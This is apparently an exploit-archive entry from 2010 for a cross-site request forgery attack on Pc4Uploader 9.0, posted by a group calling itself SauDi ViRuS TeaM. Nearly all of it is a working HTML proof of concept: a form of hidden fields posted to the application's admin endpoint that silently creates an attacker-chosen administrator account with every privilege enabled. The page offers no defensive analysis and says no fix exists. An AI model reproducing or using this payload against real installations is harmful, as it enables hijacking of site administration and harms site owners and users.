Pc4Uploader 9.0 Cross-site Request Forgery

2010-08-27 09:16:35

# Exploit Title: pc4uploader [XSRF] Add Admin Exploit# Date: 27-08-2010# Author: RENO
# TeaM : SauDi ViRuS TeaM
# SiTe: WwW.Sa-ViRuS.CoM
# Software Link: http://www.pc4arb.com/product-10.html

<html>
<title>Download</title>
<body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
<p
align="left"><font size="5"
color="#FFFFFF"><b>                                

               
</b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin
Exploit<br>
                                                                  
  
Author : RENO<br>
                                                         
    TeaM : SauDi ViRuS TeaM<br>
                                                           
  
Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
                                                       
    
Email : [email protected]</font></b></p>
<p align="center"> </p>
<p align="center"> </p>

<svt>
<center>

<form method="POST" name="form" action="http://localhost/path/admin/index.php?mod=account&add=saveadmin">
<input type="hidden" name="username" value="R3NO"/>
<input type="hidden" name="password" value="SauDi_ViRuS_TeaM"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="setting_rols" value="1"/>
<input type="hidden" name="member_rols" value="1"/>
<input type="hidden" name="files_rols" value="1"/>
<input type="hidden" name="msg_rols" value="1"/>
<input type="hidden" name="news_rols" value="1"/>
<input type="hidden" name="advs_rols" value="1"/>
<input type="hidden" name="links_rols" value="1"/>
<input type="hidden" name="support_rols" value="1"/>
<input type=submit value="Submit">
</p>

</form>
</svt>


</center>
</html>

Fixes

No fixes

In order to submit a new fix you need to be registered.